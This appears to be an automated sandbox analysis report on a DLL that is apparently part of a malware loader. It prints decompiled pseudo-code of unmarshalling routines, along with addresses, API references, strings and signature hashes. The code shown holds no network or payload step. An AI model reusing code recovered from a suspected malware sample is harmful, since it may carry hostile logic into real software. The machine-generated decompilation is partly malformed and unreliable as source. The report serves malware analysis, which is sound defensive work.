					_t67 = E6F709560( *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0x14)), 0,  *(_t103 + 0x18) & 0x000000ff);
					_t110 = _t110 + 0x14;
					 *((intOrPtr*)(_t103 - 0x20)) = _t67;
					 *((intOrPtr*)(_t103 - 0x1c)) =  *((intOrPtr*)(_t103 - 0x1c)) + 1;
				}
				_t65 =  *((intOrPtr*)( *(_t103 + 0xc) + 4)) -  *((intOrPtr*)(_t103 - 0x10));
				return _t65;
			}












                                                                                              0x6f70dcc6
                                                                                              0x6f70dcdc
                                                                                              0x6f70dcf6
                                                                                              0x6f70dcfd
                                                                                              0x6f70dd01
                                                                                              0x6f70dd09
                                                                                              0x6f70dd10
                                                                                              0x6f70dd19
                                                                                              0x6f70dd1e
                                                                                              0x6f70dd21
                                                                                              0x6f70dd28
                                                                                              0x6f70dd2a
                                                                                              0x6f70dd2c
                                                                                              0x6f70dd3b
                                                                                              0x6f70dd40
                                                                                              0x6f70dd40
                                                                                              0x6f70dd49
                                                                                              0x6f70dd53
                                                                                              0x6f70dd53
                                                                                              0x6f70dd5d
                                                                                              0x6f70dd67
                                                                                              0x6f70dd6c
                                                                                              0x6f70dd72
                                                                                              0x6f70dd72
                                                                                              0x6f70dd80
                                                                                              0x6f70dd85
                                                                                              0x6f70dd8e
                                                                                              0x6f70dd96
                                                                                              0x6f70dd9f
                                                                                              0x6f70dda2
                                                                                              0x6f70ddb4
                                                                                              0x6f70ddcf
                                                                                              0x6f70ddd4
                                                                                              0x6f70ddd7
                                                                                              0x6f70ddb1
                                                                                              0x6f70ddb1
                                                                                              0x6f70dde2
                                                                                              0x6f70de07

                                                                                              APIs
                                                                                              • __wassert.LIBCMT ref: 6F70DD3B
                                                                                                • Part of subcall function 6F70FA34: GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 6F70FAF9
                                                                                                • Part of subcall function 6F70FA34: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6F70FB25
                                                                                              Strings
                                                                                              • C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c, xrefs: 6F70DD31
                                                                                              • fUnmarshall, xrefs: 6F70DD36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Module$FileHandleName__wassert
                                                                                              • String ID: C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c$fUnmarshall
                                                                                              • API String ID: 1832359313-3937532760
                                                                                              • Opcode ID: 1c2836db63b6b22b4646ba8b62aa11da1adf5c4a309604b02903cc780d6dae3e
                                                                                              • Instruction ID: 0810d1d6d54f0bfd4ccf177c1b6438a5dcd8175e27f27f1d4accbc0d90259614
                                                                                              • Opcode Fuzzy Hash: 1c2836db63b6b22b4646ba8b62aa11da1adf5c4a309604b02903cc780d6dae3e
                                                                                              • Instruction Fuzzy Hash: 5C4173F5A002499FCB04DF68D980A9E7BF5BF49308F148159FD19AB341E735EA11CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F704580, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 53%
                                                                                              			E6F704580(void* __eflags, signed int _a4, void* _a8, signed short* _a12, signed int _a16) {
				signed int _v5;
				signed char _v6;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				void* _t95;
				void* _t99;

				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_a12 =  &(_a12[0]);
				_v6 =  *_a12 & 0xf;
				_v5 = ( *_a12 & 0xf0) >> 4;
				_a12 =  &(_a12[0]);
				E6F7073D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
				_v16 = E6F70E930( *((intOrPtr*)(_a4 + 4)), _v6 & 0x000000ff,  *((intOrPtr*)(_a4 + 4)));
				0x6f700000("got switch value 0x%x\n", _v16);
				_t99 = _t95 + 0x2c;
				_v12 = ( *_a12 & 0x0000ffff) + (_v5 & 0x000000ff);
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					 *_a8 =  *0x6f700000(_a4, _v12 & 0x0000ffff);
				}
				if((_a16 & 0x000000ff) != 0) {
					E6F710730( *_a8, 0, _v12 & 0x0000ffff);
					_t99 = _t99 + 0xc;
				}
				E6F7077F0(_a4, _a8,  &_v6, 0);
				_v20 = (_v5 & 0x000000ff) +  *_a8;
				return E6F70ED20(_a4,  &_v20, _v16, _a12, 0);
			}










                                                                                              0x6f70459c
                                                                                              0x6f7045aa
                                                                                              0x6f7045b6
                                                                                              0x6f7045c8
                                                                                              0x6f7045d1
                                                                                              0x6f7045e0
                                                                                              0x6f7045fc
                                                                                              0x6f704608
                                                                                              0x6f70460d
                                                                                              0x6f70461c
                                                                                              0x6f704626
                                                                                              0x6f704630
                                                                                              0x6f704630
                                                                                              0x6f70463a
                                                                                              0x6f70464e
                                                                                              0x6f70464e
                                                                                              0x6f704656
                                                                                              0x6f704665
                                                                                              0x6f70466a
                                                                                              0x6f70466a
                                                                                              0x6f70467b
                                                                                              0x6f704689
                                                                                              0x6f7046a9

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$got switch value 0x%x
                                                                                              • API String ID: 2102423945-3216196450
                                                                                              • Opcode ID: 1ab9564cdbb33b4128e5ee1096d1d5d3bf93eb5dc38091ac1d596aacd9433b4c
                                                                                              • Instruction ID: 7c12303768c4af15ca6e2b61b1e6fe63c21b1408417184849cbcc283ef0e488c
                                                                                              • Opcode Fuzzy Hash: 1ab9564cdbb33b4128e5ee1096d1d5d3bf93eb5dc38091ac1d596aacd9433b4c
                                                                                              • Instruction Fuzzy Hash: 354182F5904288ABCB04DFA4D850ABF7BB6AF89305F048199FD549B382D735EA10DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F7099D4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 21%
                                                                                              			E6F7099D4() {
				void* _t246;
				void* _t248;
				void* _t250;

				L0:
				while(1) {
					L0:
					 *(_t246 + 0xc) =  *(_t246 + 0xc) + (( *(_t246 + 0x10))[1] & 0x000000ff);
					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
					 *(_t246 - 8) =  &(( *(_t246 + 0x10))[ *( *(_t246 + 0x10))]);
					 *((intOrPtr*)(_t246 - 0x18)) = E6F70E3A0( *((intOrPtr*)(_t246 + 8)),  *(_t246 - 8));
					0x6f700000("embedded complex (size=%d) => %p\n",  *((intOrPtr*)(_t246 - 0x18)),  *(_t246 + 0xc));
					_t250 = _t248 + 0x14;
					if(( *(_t246 + 0x18) & 0x000000ff) != 0) {
						E6F710730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
					}
					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(0x6f71b3d8 + ( *( *(_t246 - 8)) & 0x7f) * 4));
					if( *((intOrPtr*)(_t246 - 0x14)) == 0) {
						0x6f700000("no unmarshaller for embedded type %02x\n",  *( *(_t246 - 8)) & 0x000000ff);
						_t250 = _t250 + 8;
					} else {
						if(( *( *(_t246 - 8)) & 0x000000ff) != 0x2f) {
							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)), _t246 + 0xc,  *(_t246 - 8), 0);
						} else {
							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc),  *(_t246 - 8), 0);
						}
					}
					 *(_t246 + 0xc) =  *(_t246 + 0xc) +  *((intOrPtr*)(_t246 - 0x18));
					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
					L1:
					while(( *( *(_t246 + 0x10)) & 0x000000ff) != 0x5b) {
						 *(_t246 - 0xc) =  *( *(_t246 + 0x10)) & 0x000000ff;
						 *(_t246 - 0xc) =  *(_t246 - 0xc) - 1;
						if( *(_t246 - 0xc) > 0xb8) {
							L46:
							0x6f700000("unhandled format %d\n",  *( *(_t246 + 0x10)) & 0x000000ff);
							_t250 = _t250 + 8;
							L47:
							 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[1]);
							continue;
						}
						L3:
						_t23 =  *(_t246 - 0xc) + 0x6f709b24; // 0xcccccc0f
						switch( *((intOrPtr*)(( *_t23 & 0x000000ff) * 4 +  &M6F709AE0))) {
							case 0:
								L4:
								E6F70AFA0( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc), 1);
								_push( *(_t246 + 0xc));
								_push( *( *(_t246 + 0xc)) & 0x0000ffff);
								_push("byte=%d => %p\n");
								0x6f700000();
								_t250 = _t250 + 0x18;
								 *(_t246 + 0xc) =  &(( *(_t246 + 0xc))[0]);
								goto L47;
							case 1:
								L5:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
								_push( *( *(__ebp + 0xc)) & 0x0000ffff);
								_push("short=%d => %p\n");
								0x6f700000();
								__esp = __esp + 0xc;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 2;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 2:
								L9:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *( *(__ebp + 0xc));
								_push( *( *(__ebp + 0xc)));
								_push("long=%d => %p\n");
								0x6f700000();
								__esp = __esp + 0xc;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 3:
								L12:
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 8);
								__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								asm("cvtss2sd xmm0, [eax]");
								__esp = __esp - 8;
								asm("movsd [esp], xmm0");
								_push("float=%f => %p\n");
								0x6f700000();
								__esp = __esp + 0x10;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 4:
								L13:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *(__edx + 4);
								_push(__eax);
								__ecx =  *__edx;
								_push(__ecx);
								0x6f700000();
								__esp = __esp + 8;
								_push(__eax);
								_push("longlong=%s => %p\n");
								0x6f700000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								goto L47;
							case 5:
								L14:
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 8);
								__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								__esp = __esp - 8;
								asm("movsd xmm0, [eax]");
								asm("movsd [esp], xmm0");
								_push("double=%f => %p\n");
								0x6f700000();
								__esp = __esp + 0x10;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 8;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 6:
								L6:
								__edx = __ebp - 4;
								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 4, 2);
								__ecx =  *(__ebp - 4) & 0x0000ffff;
								__edx =  *(__ebp + 0xc);
								 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
								__eax =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__ecx =  *(__ebp + 0xc);
								__edx =  *( *(__ebp + 0xc));
								_push( *( *(__ebp + 0xc)));
								_push("enum16=%d => %p\n");
								0x6f700000();
								__esp = __esp + 0xc;
								__eax =  *(__ebp + 0xc);
								if( *( *(__ebp + 0xc)) > 0x7fff) {
									_push(0x6f5);
									__eax =  *0x6f700000();
								}
								L8:
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 7:
								L15:
								 *(__ebp - 0x1c) = 0;
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								_push("pointer => %p\n");
								0x6f700000();
								__esp = __esp + 8;
								__eax =  *(__ebp + 0x10);
								__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
								if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
									__edx =  *(__ebp + 0x10);
									 *(__ebp + 0x14) =  *(__ebp + 0x10);
								}
								__eax =  *(__ebp + 0x14);
								__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
								if(__ecx != 0x11) {
									 *(__ebp + 8) =  *(__ebp + 8) + 4;
									__eax = E6F7073D0(__ecx,  *(__ebp + 8) + 4, 4);
								}
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								 *(__ebp - 0x20) =  *(__eax + 4);
								__edx =  *(__ebp + 8);
								if( *( *(__ebp + 8) + 0x34) == 0) {
									__ecx =  *(__ebp + 0x14);
									__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										 *(__ebp + 8) = E6F70AF00( *(__ebp + 8), 4);
									}
								} else {
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp + 8);
									__edx =  *(__ecx + 0x34);
									 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
									__eax =  *(__ebp + 8);
									 *( *(__ebp + 8) + 0x34) = 0;
									 *(__ebp - 0x1c) = 1;
								}
								_t109 = __ebp + 0x18; // 0x6f703c70
								__ecx =  *_t109 & 0x000000ff;
								__edx =  *(__ebp + 0x14);
								__eax =  *(__ebp + 0xc);
								__ecx =  *( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *(__ebp - 0x20);
								__ecx =  *(__ebp + 8);
								__eax = E6F70B580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *_t109 & 0x000000ff);
								if( *(__ebp - 0x1c) == 0) {
									L29:
									__edx =  *(__ebp + 0x10);
									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
									} else {
										__ecx =  *(__ebp + 0x14);
										__ecx =  *(__ebp + 0x14) + 4;
										 *(__ebp + 0x14) = __ecx;
									}
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									goto L47;
								} else {
									do {
										L24:
										__edx =  *(__ebp + 8);
										__eax =  *(__edx + 0x14);
										_push( *(__edx + 0x14));
										__ecx =  *(__ebp + 8);
										__edx =  *( *(__ebp + 8));
										__eax =  *(__ebp + 8);
										 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
										_push( *(__eax + 4) -  *(__edx + 8));
										_push("buffer=%d/%d\n");
										0x6f700000();
										__esp = __esp + 0xc;
										__edx =  *(__ebp + 8);
										__eax =  *( *(__ebp + 8));
										__ecx =  *(__eax + 8);
										__edx =  *(__ebp + 8);
										__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
										__eax =  *(__ebp + 8);
										if( *( *(__ebp + 8) + 4) > __ecx) {
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__edx + 8);
											__ecx =  *(__ebp + 8);
											__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__edx =  *(__ebp + 8);
											 *(__edx + 4) =  *(__edx + 4) - __eax;
											_push( *(__edx + 4) - __eax);
											_push("buffer overflow %d bytes\n");
											0x6f700000();
											__esp = __esp + 8;
										}
										__edx = 0;
									} while (0 != 0);
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp + 8);
									__edx =  *(__ecx + 4);
									 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp - 0x20);
									 *( *(__ebp + 8) + 4) = __ecx;
									__edx =  *(__ebp + 0x14);
									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										__ecx =  *(__ebp + 8);
										__eax = E6F70AF00( *(__ebp + 8), 4);
									}
									goto L29;
								}
							case 8:
								L33:
								__ecx =  *(__ebp - 0x10);
								__edx = __ebp + 0xc;
								__eax = E6F707480(__ecx, __ebp + 0xc, __ecx, 2);
								goto L47;
							case 9:
								L34:
								__eax =  *(__ebp - 0x10);
								__ecx = __ebp + 0xc;
								__eax = E6F707480(__ecx, __ecx,  *(__ebp - 0x10), 4);
								goto L47;
							case 0xa:
								L35:
								__edx =  *(__ebp - 0x10);
								__ebp + 0xc = E6F707480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
								goto L47;
							case 0xb:
								L36:
								__ecx =  *(__ebp + 0x10);
								 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
								 *(__ebp + 0xc) = E6F710730( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
								__ecx =  *(__ebp + 0x10);
								__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 0xc:
								goto L0;
							case 0xd:
								L45:
								goto L47;
							case 0xe:
								L10:
								__edx = __ebp - 0x24;
								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 0x24, 4);
								__ecx =  *(__ebp + 0xc);
								__edx =  *(__ebp - 0x24);
								 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
								__eax =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__ecx =  *(__ebp + 0xc);
								__edx =  *__ecx;
								_push( *__ecx);
								_push("int3264=%ld => %p\n");
								0x6f700000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								goto L47;
							case 0xf:
								L11:
								__ecx = __ebp - 0x28;
								__edx =  *(__ebp + 8);
								E6F70AFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
								__ecx =  *(__ebp - 0x28);
								 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								__ecx =  *( *(__ebp + 0xc));
								_push(__ecx);
								_push("uint3264=%ld => %p\n");
								0x6f700000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								goto L47;
							case 0x10:
								goto L46;
						}
					}
					return  *(_t246 + 0xc);
				}
			}






                                                                                              0x6f7099d4
                                                                                              0x6f7099d4
                                                                                              0x6f7099d4
                                                                                              0x6f7099e6
                                                                                              0x6f7099ef
                                                                                              0x6f7099fb
                                                                                              0x6f709a0e
                                                                                              0x6f709a1e
                                                                                              0x6f709a23
                                                                                              0x6f709a2c
                                                                                              0x6f709a38
                                                                                              0x6f709a3d
                                                                                              0x6f709a50
                                                                                              0x6f709a57
                                                                                              0x6f709a96
                                                                                              0x6f709a9b
                                                                                              0x6f709a59
                                                                                              0x6f709a62
                                                                                              0x6f709a85
                                                                                              0x6f709a64
                                                                                              0x6f709a72
                                                                                              0x6f709a72
                                                                                              0x6f709a88
                                                                                              0x6f709aa4
                                                                                              0x6f709aad
                                                                                              0x00000000
                                                                                              0x6f70956c
                                                                                              0x6f709581
                                                                                              0x6f70958a
                                                                                              0x6f709594
                                                                                              0x6f709ab7
                                                                                              0x6f709ac3
                                                                                              0x6f709ac8
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad1
                                                                                              0x6f70959a
                                                                                              0x6f70959d
                                                                                              0x6f7095a4
                                                                                              0x00000000
                                                                                              0x6f7095ab
                                                                                              0x6f7095b5
                                                                                              0x6f7095c0
                                                                                              0x6f7095c7
                                                                                              0x6f7095c8
                                                                                              0x6f7095cd
                                                                                              0x6f7095d2
                                                                                              0x6f7095db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7095e3
                                                                                              0x6f7095e5
                                                                                              0x6f7095ed
                                                                                              0x6f7095f5
                                                                                              0x6f7095f8
                                                                                              0x6f7095f9
                                                                                              0x6f7095fc
                                                                                              0x6f7095ff
                                                                                              0x6f709600
                                                                                              0x6f709605
                                                                                              0x6f70960a
                                                                                              0x6f70960d
                                                                                              0x6f709610
                                                                                              0x6f709613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709671
                                                                                              0x6f709673
                                                                                              0x6f70967b
                                                                                              0x6f709683
                                                                                              0x6f709686
                                                                                              0x6f709687
                                                                                              0x6f70968a
                                                                                              0x6f70968c
                                                                                              0x6f70968d
                                                                                              0x6f709692
                                                                                              0x6f709697
                                                                                              0x6f70969a
                                                                                              0x6f70969d
                                                                                              0x6f7096a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709726
                                                                                              0x6f709728
                                                                                              0x6f70972c
                                                                                              0x6f709730
                                                                                              0x6f709738
                                                                                              0x6f70973b
                                                                                              0x6f70973c
                                                                                              0x6f70973f
                                                                                              0x6f709743
                                                                                              0x6f709746
                                                                                              0x6f70974b
                                                                                              0x6f709750
                                                                                              0x6f709755
                                                                                              0x6f709758
                                                                                              0x6f70975b
                                                                                              0x6f70975e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709766
                                                                                              0x6f709768
                                                                                              0x6f709770
                                                                                              0x6f709778
                                                                                              0x6f70977b
                                                                                              0x6f70977c
                                                                                              0x6f70977f
                                                                                              0x6f709782
                                                                                              0x6f709783
                                                                                              0x6f709785
                                                                                              0x6f709786
                                                                                              0x6f70978b
                                                                                              0x6f70978e
                                                                                              0x6f70978f
                                                                                              0x6f709794
                                                                                              0x6f709799
                                                                                              0x6f70979f
                                                                                              0x6f7097a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7097aa
                                                                                              0x6f7097ac
                                                                                              0x6f7097b0
                                                                                              0x6f7097b4
                                                                                              0x6f7097bc
                                                                                              0x6f7097bf
                                                                                              0x6f7097c0
                                                                                              0x6f7097c3
                                                                                              0x6f7097c6
                                                                                              0x6f7097ca
                                                                                              0x6f7097cf
                                                                                              0x6f7097d4
                                                                                              0x6f7097d9
                                                                                              0x6f7097dc
                                                                                              0x6f7097df
                                                                                              0x6f7097e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70961b
                                                                                              0x6f70961d
                                                                                              0x6f709625
                                                                                              0x6f70962d
                                                                                              0x6f709631
                                                                                              0x6f709634
                                                                                              0x6f709636
                                                                                              0x6f709639
                                                                                              0x6f70963a
                                                                                              0x6f70963d
                                                                                              0x6f70963f
                                                                                              0x6f709640
                                                                                              0x6f709645
                                                                                              0x6f70964a
                                                                                              0x6f70964d
                                                                                              0x6f709656
                                                                                              0x6f709658
                                                                                              0x6f70965d
                                                                                              0x6f70965d
                                                                                              0x6f709663
                                                                                              0x6f709663
                                                                                              0x6f709666
                                                                                              0x6f709669
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7097ea
                                                                                              0x6f7097ea
                                                                                              0x6f7097f1
                                                                                              0x6f7097f4
                                                                                              0x6f7097f5
                                                                                              0x6f7097fa
                                                                                              0x6f7097ff
                                                                                              0x6f709802
                                                                                              0x6f709805
                                                                                              0x6f70980b
                                                                                              0x6f70980d
                                                                                              0x6f709810
                                                                                              0x6f709810
                                                                                              0x6f709813
                                                                                              0x6f709816
                                                                                              0x6f70981c
                                                                                              0x6f709823
                                                                                              0x6f709827
                                                                                              0x6f70982c
                                                                                              0x6f70982f
                                                                                              0x6f709832
                                                                                              0x6f709835
                                                                                              0x6f709838
                                                                                              0x6f70983f
                                                                                              0x6f709860
                                                                                              0x6f709863
                                                                                              0x6f709869
                                                                                              0x6f709871
                                                                                              0x6f709876
                                                                                              0x6f709841
                                                                                              0x6f709841
                                                                                              0x6f709844
                                                                                              0x6f709847
                                                                                              0x6f70984a
                                                                                              0x6f70984d
                                                                                              0x6f709850
                                                                                              0x6f709857
                                                                                              0x6f709857
                                                                                              0x6f709879
                                                                                              0x6f709879
                                                                                              0x6f70987e
                                                                                              0x6f709882
                                                                                              0x6f709885
                                                                                              0x6f709888
                                                                                              0x6f70988c
                                                                                              0x6f709890
                                                                                              0x6f709894
                                                                                              0x6f7098a0
                                                                                              0x6f709935
                                                                                              0x6f709935
                                                                                              0x6f709938
                                                                                              0x6f70993e
                                                                                              0x6f70994e
                                                                                              0x6f709951
                                                                                              0x6f709940
                                                                                              0x6f709940
                                                                                              0x6f709943
                                                                                              0x6f709946
                                                                                              0x6f709946
                                                                                              0x6f709957
                                                                                              0x6f70995a
                                                                                              0x00000000
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a9
                                                                                              0x6f7098ac
                                                                                              0x6f7098ad
                                                                                              0x6f7098b0
                                                                                              0x6f7098b2
                                                                                              0x6f7098b8
                                                                                              0x6f7098bb
                                                                                              0x6f7098bc
                                                                                              0x6f7098c1
                                                                                              0x6f7098c6
                                                                                              0x6f7098c9
                                                                                              0x6f7098cc
                                                                                              0x6f7098ce
                                                                                              0x6f7098d1
                                                                                              0x6f7098d4
                                                                                              0x6f7098d7
                                                                                              0x6f7098dd
                                                                                              0x6f7098df
                                                                                              0x6f7098e2
                                                                                              0x6f7098e4
                                                                                              0x6f7098e7
                                                                                              0x6f7098ea
                                                                                              0x6f7098ed
                                                                                              0x6f7098f3
                                                                                              0x6f7098f5
                                                                                              0x6f7098f6
                                                                                              0x6f7098fb
                                                                                              0x6f709900
                                                                                              0x6f709900
                                                                                              0x6f709903
                                                                                              0x6f709903
                                                                                              0x6f709907
                                                                                              0x6f70990a
                                                                                              0x6f70990d
                                                                                              0x6f709910
                                                                                              0x6f709913
                                                                                              0x6f709916
                                                                                              0x6f709919
                                                                                              0x6f70991c
                                                                                              0x6f70991f
                                                                                              0x6f709925
                                                                                              0x6f709929
                                                                                              0x6f70992d
                                                                                              0x6f709932
                                                                                              0x00000000
                                                                                              0x6f709925
                                                                                              0x00000000
                                                                                              0x6f709962
                                                                                              0x6f709964
                                                                                              0x6f709968
                                                                                              0x6f70996c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709979
                                                                                              0x6f70997b
                                                                                              0x6f70997f
                                                                                              0x6f709983
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709990
                                                                                              0x6f709992
                                                                                              0x6f70999a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7099a7
                                                                                              0x6f7099a7
                                                                                              0x6f7099ad
                                                                                              0x6f7099b7
                                                                                              0x6f7099bf
                                                                                              0x6f7099c2
